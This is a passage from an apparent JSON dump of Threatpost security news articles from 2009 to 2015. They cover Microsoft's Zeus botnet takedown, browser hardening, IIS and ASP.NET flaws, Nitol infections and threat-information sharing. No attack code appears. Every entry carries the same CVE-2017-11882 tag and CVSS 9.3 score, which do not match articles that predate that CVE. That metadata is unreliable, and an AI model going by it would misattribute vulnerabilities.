[Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>).\n\nZeus is one of the more widespread and well-known pieces of malware to appear in the last five years and is among the new breed of tools that\u2019s sold in various forms to anyone who can pay the freight. The Zeus kit enables an attacker to monitor a user\u2019s actions on a compromised machine, steal credentials for online banking or other valuable sites and then rack up huge profits. Like other major botnets operating right now, the Zeus network is not one botnet but dozens and dozens of individual networks operated by various criminals around the world. \n\nMicrosoft\u2019s anti-Zeus operation resulted in the takedown of two C&amp;C servers that are used in the global Zeus network, but the company\u2019s officials say they have no illusions that this move will cripple the entire Zeus system. \n\n\u201cWe don\u2019t expect this action to have wiped out every Zeus botnet operating in the world. However, together, we have proactively disrupted some of the most harmful botnets, and we expect this effort will significantly impact the cybercriminal underground for quite some time. Cybercriminals are in this for the money and this action was an unprecedented strike against the illicit infrastructure on which they rely. The operation will help further investigations against those responsible for the threat and help us better protect victims,\u201d Richard Domingues Boscovich, a senior attorney in Microsoft\u2019s Digital Crimes Unit, wrote in an analysis of the [Zeus botnet takedown](<http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx>).\n\nLast Monday, Microsoft [filed suit in the Eastern District of New York](<http://www.zeuslegalnotice.com/>) against the unnamed defendants, saying that they, using various aliases and handles, had operated the Zeus botnet. The company, along with the National Automated Clearing House Association, asked the court for permission to cut off the C&amp;C infrastructure of Zeus and also asked that the case be temporarily sealed in order to preserve the element of surprise against the suspects. The court granted both requests, and on Friday officials from Microsoft, NACHA and the Financial Services Information Sharing Analysis Center went with U.S. Marshals to execute the seizure of the servers.\n\n\u201cOn March 23, Microsoft, FS-ISAC and NACHA \u2013 escorted by the U.S. Marshals \u2013 successfully executed a coordinated physical seizure of command and control servers in two hosting locations to seize and preserve valuable data and virtual evidence from the botnets for the case. We took down two IP addresses behind the Zeus \u2018command and control\u2019 structure. Microsoft also currently monitors 800 domains secured in the operation, which helps us to identify thousands of Zeus-infected computers,\u201d Boscovich said. \n\nThe botnets affected by the Zeus takedown action include some running the Ice-IX and SpyEye variants of the malware. The Zeus codebase has forked and evolved over time and some features of the once-competitive SpyEye toolkit were included in some versions recently.\n\nIn an interesting twist to the takedown, Microsoft and the other plaintiffs in the case decided to use the civil section of the RICO statute to go after the group of defendants, allowing them to group the alleged botnet controllers under the umbrella of one organized criminal enterprise. The statute typically is used in organized crime prosecutions, but the nature of the Zeus operation lent itself to the same kind of action.\n\n\u201cUpon information and belief, John Does 1-39 constitute a group of persons associated together for a common purpose of engaging in a course of conduct, as part of an ongoing organization, with the various associates functioning as a continuing unit. The Defendants\u2019 enterprise has a purpose, with relationships among those associated with the enterprise, and longevity sufficient to permit those associates to pursue the enterprise\u2019s purpose. Upon information and belief, Defendants John Doe 1, John Doe 2, and John Doe 3 conspired to, and did, form an associated in fact enterprise (herein after the \u201cZeus Racketeering Enterprise\u201d) with a common purpose of developing and operating a global credential stealing botnet operation as set forth in detail herein,\u201d the complaint filed against the botnet operators says. \n\n\u201cBoth the purpose of the Zeus Racketeering Enterprise and the relationship between the Defendants is proven by: (1) the consolidation of the original Zeus botnet and the SpyEye botnet; (2) the subsequent development and operation of the enhanced Ice-IX botnet; and (3) Defendants\u2019 respective and interrelated roles in the sale, operation of, and profiting from the Zeus Botnets in furtherance of Defendants\u2019 common financial interests.\u201d\n\nMicrosoft\u2019s Boscovich said the use of RICO was an important aspect of the case.\n\n\u201cIn criminal court cases, the RICO Act is often associated with cases against organized crime; the same is true in applying the civil section of the law to this case against what we believe is an organization of people behind the Zeus family of botnets. By incorporating the use of the RICO Act, we were able to pursue a consolidated civil case against everyone associated with the Zeus criminal operation, even if those involved in the \u2018organization\u2019 were not necessarily part of the core enterprise,\u201d he said.\n", "cvss3": {}, "published": "2012-03-26T12:05:14", "type": "threatpost", "title": "Microsoft, Financial Groups Execute Takedown of Zeus Botnet Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:34", "id": "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "href": "https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/76364/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:09", "description": "Microsoft launched a new transparency website this week that bundles reports detailing requests for data the company has received, including those from law enforcement, the government, and elsewhere.\n\nThe page, which Microsoft is calling its [Transparency Hub](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/>), is somewhat similar to [what Apple did last month](<https://threatpost.com/apple-goes-all-in-on-privacy/114846/>) when it looped all of its transparency reports together on one page.\n\nWhile Microsoft has issued transparency reports regarding requests from law enforcement and the U.S. government in the past, this is the first time it\u2019s broken down requests the company has received from other parties to outright remove content on sites such as its search engine Bing.\n\nLike the other two reports, the \u201c[Content Removal Requests Report](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/crrr/>)\u201d pertains to requests from the first six months of the calendar year. The main difference is this report mostly culls information on requests from other governments, requests from European residents citing a special European Court of Justice ruling, and requests from copyright owners claiming their work was infringed.\n\nAccording to the report, China far and away had the most requests for content to be removed, with 165 requests filed compared to 11 from the United States, and 10 from Austria, Germany, Russia, and the U.K. combined. The report doesn\u2019t specify exactly what the content was or where it was located, but claims the numbers are from Microsoft entities like Bing, OneDrive, and MSN.\n\nThere were many more requests to remove copyrighted information, just north of one million, according to Microsoft. In this case, it was usually URLs that were being shown in Bing searches that contained copyrighted material. Microsoft claims it complied with 92 percent of requests. Since this is an inaugural report however, there are no statistics from last year to compare the numbers to.\n\nThe company received 3,546 requests from European residents to remove results for queries in Bing that included their name. A rule passed last year called the \u2018Right To Be Forgotten\u2019 rule allows users to ask their name be removed if the results were inadequate, inaccurate or no longer relevant. Microsoft complied with 50 percent of those requests.\n\nAs far as law enforcement requests, Microsoft received 35,228, a slight uptick from the second half of 2014 when it received 31,002. The report claims only three percent of requests it received led to the disclosure of content customers created, shared or stored on its services. The company rejected 12 percent of requests, up from 7.5 percent in the second half of last year.\n\nThe company, as it\u2019s done for the past several years, also claims it received somewhere [between zero and 999 National Security Letters](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/fisa/>). The government only permits companies to disclose requests in bands of 1000, which explains the vague number.\n\nThe company got permission to start sharing information pertaining to legal demands they receive in early 2014 but has been posting the reports pertaining to law enforcement twice a year [since 2013](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653/>), largely in response to a growing demand for transparency from big data companies in the post-Snowden world.\n", "cvss3": {}, "published": "2015-10-15T15:32:57", "type": "threatpost", "title": "Latest Microsoft Transparency Report Details Content Removal Requests", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-15T19:32:57", "id": "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "href": "https://threatpost.com/latest-microsoft-transparency-report-details-content-removal-requests/115062/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:45", "description": "In the midst of a relatively light [Patch Tuesday](<https://threatpost.com/critical-ie-update-one-of-eight-microsoft-security-bulletins/113231>), Microsoft yesterday introduced an [extra measure of security](<http://blogs.windows.com/msedgedev/2015/06/09/http-strict-transport-security-comes-to-internet-explorer-11-on-windows-8-1-and-windows-7/>) for users running Internet Explorer 11 on Windows 7 and Windows 8.1 machines: HSTS.\n\nShort for HTTP Strict Transport Security, HSTS is a browser header that forces any sessions sent over HTTP to be sent instead over HTTPS based on a [preloaded list of sites](<https://hstspreload.appspot.com/>) supporting the protocol. HSTS encrypts communication to and from a website, and puts a dent in attempts to man-in-the-middle web sessions. According to OWASP, HSTS also stops attackers who use invalid digital certificates. The protocol denies users the ability to override invalid certificate messages. HSTS also protects users from HTTPS websites that also may include HTTP links or serve content unencrypted.\n\n[HSTS is already on by default](<https://support.microsoft.com/de-de/kb/3058515/en-us>) in Internet Explorer 11 available in the Windows 10 Insider Preview and the new Microsoft Edge expected to be available when Windows 10 releases later this year.\n\n\u201cSite developers can use HSTS policies to secure connections by opting in to an HSTS preload list, which registers websites to be hardcoded by Microsoft Edge, Internet Explorer, and other browsers to redirect HTTP traffic to HTTPS,\u201d said Kyle Pflug, program manager with the Microsoft Edge team. \u201cCommunications with these websites from the initial connection are automatically upgraded to be secure.\u201d\n\nMicrosoft is the last of the major browser vendors to add HSTS support. Google Chrome and Mozilla Firefox have supported HSTS since 2011, while Apple added it to Safari upon the release of version 10.9 of Mavericks.\n\nThe move comes on the heels of Microsoft in May bringing Perfect Forward Secrecy to Windows. Forward secrecy has of late been considered an essential security measure, especially for new applications. It ensures that new private keys are negotiated for every web session, meaning that if a key is ever compromised in the future, only that particular session will be at risk. In order to attack each session, each key would have to be attacked separately.\n\nThe addition of HSTS was included in a [cumulative update for Internet Explorer](<https://technet.microsoft.com/en-us/library/security/ms15-056.aspx>) released yesterday. The security bulletin included patches for two dozen vulnerabilities in the browser, most of which gave hackers the ability to remotely execute code on a compromised computer.\n\nHSTS also resolves Mixed Content attacks where insecure HTTP script is loaded from a site secured via a HTTPS connection.\n\n\u201cWhen we initially announced HSTS in Windows 10, we noted that mixed content is not supported on servers supporting HSTS. With today\u2019s updates, this is still the case in Microsoft Edge on Windows 10 \u2013 mixed content is always blocked on these servers,\u201d Pflug said. \u201cFor Internet Explorer 11 on Windows 10, Windows 8.1, and Windows 7, the Information bar will prompt the user to proceed in mixed content scenarios.\u201d\n", "cvss3": {}, "published": "2015-06-10T11:47:26", "type": "threatpost", "title": "Microsoft Brings HSTS to Windows 7 and 8.1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-12T15:00:26", "id": "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "href": "https://threatpost.com/microsoft-brings-hsts-to-windows-7-and-8-1/113258/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "description": "[](<https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/>)Microsoft dismissed recently-disclosed threats to its BitLocker \ndisk-encryption technology as \u201crelatively low risk,\u201d noting that \nattackers must not only have physical access to a targeted PC, but must \nmanipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld] \n", "cvss3": {}, "published": "2009-12-08T20:24:42", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:57:07", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:22", "description": "Next week\u2019s Microsoft [Patch Tuesday security bulletins](<https://technet.microsoft.com/en-us/library/security/MS14-AUG>) will not only bring nine new security bulletins but also an update to Internet Explorer that blocks outdated ActiveX controls, starting with Java.\n\nNotifications will flag the older ActiveX controls and users will have the option to update the control immediately or run it for a particular instance. IT administrators will also have the option to configure the update to block older controls outright, and not just warn the user.\n\n\u201cBecause many ActiveX controls aren\u2019t automatically updated, they can become outdated as new versions are released,\u201d Microsoft said this week in its [announcement](<http://blogs.msdn.com/b/ie/archive/2014/08/06/internet-explorer-begins-blocking-out-of-date-activex-controls.aspx>). \u201cIt\u2019s very important that you keep your ActiveX controls up-to-date because malicious or compromised Web pages can target security flaws in outdated controls to collect information, install dangerous software, or by let someone else control your computer remotely.\u201d\n\nThe update, called out-of-date ActiveX control blocking, fires off a flag when the browser stops a website from loading an older control, while still allowing a user to interact with the rest of the page that is unaffected by the control. In addition to being able to update the control, IT shops can get an inventory of resident ActiveX controls via a new logging setting in Group Policy, Microsoft said.\n\nThe setting lists ActiveX controls that are permissible or will be blocked.\n\n\u201cCreating an inventory of ActiveX controls can also show which ActiveX controls are compatible with Enhanced Protected Mode, an Internet Explorer 11 security feature which provides additional protection against browser exploits\u2014but not all ActiveX controls are compatible with EPM, so this feature can help assess your organization\u2019s readiness for blocking out-of-date ActiveX controls and enabling EPM,\u201d Microsoft said.\n\nIn all, there are four new Group Policy settings related to the new update, including an enforced blocking setting that denies users the ability to use the \u201cRun This Time\u201d option in the notification. Admins can also create a list top level domains, host names or files where IE will not block outdated controls. Admins can also disable the feature altogether. The feature will also be off by default in the Local Intranet Zone and Trusted Sites Zone allowing intranet sites and homegrown apps to run unimpeded inside the firewall.\n\nMicrosoft said next Tuesday\u2019s update will start with blocking older versions of Java, including Java SE 8 prior to update 11, Java SE 7 prior to update 65 and Java 6 prior to update 81. The update will be supported only on IE 8-11 on Windows 7 SP1, IE versions supported on Windows 8 and higher, and all Security Zones in the browser.\n\n\u201cWe know that many organizations still rely on the capabilities of ActiveX controls, but out-of-date ActiveX controls are a risk today,\u201d Microsoft said. \u201cBy helping consumers stay up-to-date\u2014and enabling IT to better manage ActiveX controls, including those that are compatible with Enhanced Protected Mode\u2014Microsoft is helping customers stay safer online.\u201d\n\nAs for the regularly scheduled Patch Tuesday security bulletins, two of the nine are rated critical, but three bulletins address remote code execution vulnerabilities. The two critical RCE bugs are in IE and Windows Media Center TV Pack for Vista respectively, while the third, rated important likely because it requires user interaction, is in Office, specifically OneNote 2007, SP 3.\n\nFour other important bulletins address elevation of privilege bugs in Microsoft SQL Server, Windows Server, and Microsoft SharePoint Server 2013.\n\nFinally, two security bypass features are also being patched in the .NET framework and Windows Server.\n", "cvss3": {}, "published": "2014-08-08T11:55:44", "type": "threatpost", "title": "IE to Block Older ActiveX Controls, Starting with Java", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-08T15:55:44", "id": "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "href": "https://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[](<https://threatpost.com/serious-new-flaw-found-iis-60-051809/>)\n\nA new remotely-exploitable vulnerability has been found in the Microsoft IIS 6.0 Web server. The flaw is quite similar to one that was discovered eight years ago in earlier versions of IIS, and exploitation of the weakness could enable an attacker to upload content to the vulnerable server.\n\nThe vulnerability is in the implementation of the WebDAV protocol in IIS 6.0, which allows remote users to access and modify documents on a Web server. News of the vulnerability, discovered by a researcher named Nikolaos Rangos, hit the [Full Disclosure security mailing list](<http://seclists.org/fulldisclosure/2009/May/att-0134/IIS_Advisory_pdf>) last week. Here are the details, from Rangos\u2019s advisory:\n\nThis vulnerability allows remote attackers to bypass access restrictions on vulnerable installations of Internet Information Server 6.0. The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can \nresult in the following: \n\u2013 Authentication bypass of password protected folders \n\u2013 Listing, downloading and uploading of files into a password protected WebDAV folder\n\nThere is no patch available for this vulnerability, so experts at the SANS Internet Storm Center are recommending that people disable WebDAV in the interim. Thierry Zoller has a good analysis of the [IIS 6.0 vulnerability](<http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html>) as well.\n\nMicrosoft\u2019s Security Response Center is investigating the WebDAV vulnerability and is in the process of putting together an advisory on it.\n\n\u201cMicrosoft is investigating new public claims of a possible vulnerability in Internet Information Services. We\u2019re currently unaware of any attacks trying to use the claimed vulnerability or of customer impact. We are working on a security advisory to provide customers with guidance to help protect themselves,\u201d said Christopher Budd, security response communications lead at Microsoft.\n", "cvss3": {}, "published": "2009-05-18T15:36:07", "type": "threatpost", "title": "Serious new flaw found in IIS 6.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:7957677E374E9980D5154F756D4A2E00", "href": "https://threatpost.com/serious-new-flaw-found-iis-60-051809/72672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:47", "description": "[](<https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/>)Microsoft today announced plans to share pre-patch details on software vulnerabilities with governments around the world under a new program aimed at securing critical infrastructure and government assets from hacker attacks.\n\nThe program, codenamed Omega, features a Defensive Information Sharing Program (DISP) will offer governments entities at the national level with technical information on vulnerabilities that are being updated in our products.\n\nMicrosoft\u2019s Steve Adegbite [explains](<http://blogs.technet.com/ecostrat/archive/2010/05/17/strengthening-the-security-cooperation-program.aspx>):\n\n_We will provide this information after our investigative and remediation cycle is completed to ensure that DISP members are receiving the most current information. While this process varies from issue to issue due to the complex nature of vulnerabilities, disclosure will happen just prior to our security update release cycles._\n\nThe company also announced a second information sharing program called the Critical Infrastructure Partner Program (CIPP) that aims to \u201cprovide valuable insights on security policy, including strategies, approaches to help aid the protection efforts for critical infrastructures,\u201d according to Adegbite.\n", "cvss3": {}, "published": "2010-05-18T19:01:18", "type": "threatpost", "title": "Microsoft to Share Vulnerability Details with Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:45:12", "id": "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "href": "https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/73986/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Microsoft earlier this week published [a 25-page framework](<http://blogs.microsoft.com/cybertrust/2015/01/27/putting-information-sharing-into-context/>) offering guidance on how to effectively share information and what kinds of information need to be shared in order to reduce overall risk.\n\n[Information sharing](<http://threatpost.com/information-sharing-on-threats-seen-as-a-key-for-auto-makers/108185>) has been an oft-repeated refrain in security and policy-making circles for the better part of the last decade. There have been [draft bills](<http://threatpost.com/senate-draft-bill-to-protect-threat-information-sharing/105769>), [sharing platforms](<http://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798>) and every kind of [appeal](<http://threatpost.com/nsas-alexander-appeals-for-threat-information-sharing/102404>), [encouragement](<http://threatpost.com/regulator-warns-banks-about-ddos-attacks-encourages-information-sharing-122712/77349>) and assurance; yet there has also been quiet mutterings that organizations simply do not want to share information for a variety of reasons, not limited to competition concerns and personal embarrassment. In theory, sharing information and building a sort of defensive cooperative seems simple enough. However, the reality is that we are still talking about threat information sharing like it isn\u2019t happening despite the fact that it\u2019s a perpetual topic of discussion at nearly every corporate and government security conference.\n\nMicrosoft\u2019s framework seeks to define all the parties that need to be involved in any comprehensive information sharing exchange as well as the types of information that those groups need to be sharing. In addition to knowing with whom to share what information, Microsoft\u2019s document offers insight into designing methods, mechanisms and models for data sharing exchanges.\n\nBroadly speaking, Microsoft advises that organizations develop an overarching strategy for information sharing and collaboration with built-in privacy protections and a well-established governance processes. Sharing, they say, should focus on actionable threat, vulnerability and mitigation information. Organizations need to build relationships in order to enable voluntary, trust-based information sharing, whereas mandatory sharing should remain limited. Once information is being shared, companies must ensure they are using that information to its full potential. Beyond these, Microsoft says their needs to be a voluntary, global exchange of emerging best practices.\n\nPerhaps not quite as broadly as best practices, Microsoft is encouraging that information-sharing exchanges of varying degrees of openness discuss successful attacks, including the information lost, techniques used, intent, and impact. They should also trade information about potential future threats and exploitable vulnerabilities and ways of mitigating bugs ahead of patch releases. Executive-level situational awareness, which could allow organizations to respond more quickly to attacks as well as strategic analysis of threats face and information sought by attackers should be shared too.\n\nLaws can compel incident reporting, but they do not increase trust or collaboration nor do they reduce risks\n\nMicrosoft says there are basically six categories of people to include in exchanges: governments, private critical infrastructure firms, enterprises, information technology, security companies and security researchers.\n\nMicrosoft encourages efforts by policymakers to construct legislation that would encourage information sharing. However, trust between those incorporated into information sharing exchanges, the computer company says, is critically important.\n\n\u201cLaws can compel incident reporting,\u201d Microsoft notes, \u201cbut they do not increase trust or collaboration nor do they reduce risks.\u201d\n\nExchange models can be voluntary or mandatory, though Microsoft explains that the former is the richer model. Microsoft favors voluntary sharing models because they serve to increase the level of trust between partners. On the other hand, mandatory models could shift the focus from smart collaborative defense to companies merely reporting threat-related information for the sake of reporting it because they are required to do so.\n\n> Microsoft publishes guidance on establishing and operating threat information sharing exchanges\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fmicrosoft-publishes-information-sharing-guidelines%2F110740%2F&text=Microsoft+publishes+guidance+on+establishing+and+operating+threat+information+sharing+exchanges>)\n\nIn terms of exchange methodology, organizations and groups thereof need to consider the level of formality of their network. Formal exchanges are generally based on contractual or non-disclosure agreements while less formal, ad hoc exchanges are generally event-specific. Subsets of formalized exchanges will be necessarily based on security clearance levels while less formalized groups of like-minded organizations can share information with one another based entirely on trust within the group.\n\n\u201cHigh-quality strategic information can help to project where the next classes of cyber-threats may come from and to identify the incentives that could motivate future attackers, along with the technologies they may target,\u201d Microsoft says. \u201cAdditionally, strategic analysis can help put incidents into a broader context and can drive internal changes, enhancing the ability of any public or private organization to update risk management practices that reduce its exposure to risk.\u201d\n\nInformation sharing, Microsoft\u2019s Cristin Goodwin and J. Paul Nicholas explain, is not merely a human-to-human exercise but must also be automated between machines to some degree.\n\n\u201cAmong security professionals, there is currently a lot of focus on developing systems that automate the exchange of information,\u201d Microsoft wrote. \u201cIt is believed that such systems enable actors not only to identify information important to them more quickly, but also to automate mitigations to threats as they occur.\u201d\n", "cvss3": {}, "published": "2015-01-29T13:58:34", "type": "threatpost", "title": "Microsoft Publishes Information Sharing Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:30", "id": "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "href": "https://threatpost.com/microsoft-publishes-information-sharing-guidelines/110740/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/>)When Microsoft went after the [Nitol botnet](<https://threatpost.com/microsoft-carries-out-nitol-botnet-takedown-091312/>) in September, one of the key details in the investigation was the fact that much of the botnet was built by pre-loading malware onto laptops during the manufacturing process in China. This was the clearest case yet of the phenomenon of [certified pre-owned devices](<https://threatpost.com/new-study-sees-need-better-software-integrity-controls-061410/>) making their way through the supply chain and into the market. As it turns out, nearly half a million of those infected machines showed up here in the U.S.\n\nResearch from Microsoft into the location of the Nitol-infected machines shows that the large majority of them are in China, nearly 800,000 of them. That\u2019s more than 30 percent of all of the machines on which Microsoft detected the Nitol malware, and the company said that about one in every five machines purchased in China through the compromised supply chain had malware on it.\n\nAlthough the number of infected systems in the United States wasn\u2019t nearly as high as in China, Microsoft did find nearly 500,000 PCs in the U.S. loaded with Nitol, a pretty significant volume of infections.\n\n\u201cMMPC\u2019s infection figures for [Win32/Nitol](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32/Nitol> \"MMPC Encyclopedia entry for Win32/Nitol\" ) reflect the Microsoft study, placing China on the top spot with a whopping 31.60%, way above the United States (18.51%) and Taiwan (16.79%). Thailand and Korea round out the top five,\u201d [Rex Plantodo of the Microsoft Malware Protection Center.](<https://blogs.technet.com/b/mmpc/archive/2012/10/22/msrt-october-12-nitol-by-the-numbers.aspx?Redirected=true>)\n\nMicrosoft began looking into the Nitol botnet more than a year ago after buying 20 laptops in China and discovering that some of them had been pre-loaded with the Nitol malware, as well as a few other pieces of malicious software. Nitol is a nasty bit of code and has quite a list of malicious capabilities. It has rootkit functionality and also can laucnh DDoS attacks on orders from a remote command-and-control server.\n\nMicrosoft\u2019s takedown of Nitol disrupted much of the botnet\u2019s operations, but it didn\u2019t completely eliminate it. The company\u2019s detections show a major drop in Nitol infections since September, but there are still more than 200,000 infections in October.\n\n \n\n", "cvss3": {}, "published": "2012-10-24T17:59:06", "type": "threatpost", "title": "Nitol Infections Fall, But Malware Still Popping Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "href": "https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/77149/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "[](<https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/>)WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. \u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. \u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:02", "description": "A few days after MIcrosoft released a patch to fix a vulnerability in ASP.NET that could enable a denial-of-service attack, someone has released exploit code for the vulnerability. \n\nThe proof-of-concept [exploit code](<https://github.com/HybrisDisaster/aspHashDoS>) was posted to the Full Disclosure mailing list and is available for download from GitHUb. Posted by a user named HybrisDisaster, the code is designed to exploit a recently discovered vulnerability in ASP.NET that\u2019s related to the way that the software handles certain HTTP post requests. The vulnerability was first disclosed in late December at the Chaos Communications Congress in Germany.\n\nThe problem isn\u2019t actually specific to ASP.NET, but affects a variety of languages and applications. Microsoft shipped an emergency patch for the flaw on Dec. 29, recommending that users install it as quickly as possible.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Suha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\nThe base cause of the problem is that when ASP.NET comes across a form submission with some specific characteristics, it will need to perform a huge amount of computations that could consume all of the server\u2019s rresources.\n", "cvss3": {}, "published": "2012-01-09T16:00:19", "type": "threatpost", "title": "Exploit Code Released for ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:D58796CB8261B361ADF389131F955AE3", "href": "https://threatpost.com/exploit-code-released-aspnet-flaw-010912/76073/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:55", "description": "The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.\n\nThe flaw affects nearly all IPv4 DHCP clients and relays and most servers, ISC said in its [advisory](<https://kb.isc.org/article/AA-01334>).\n\n\u201cA badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally,\u201d ISC 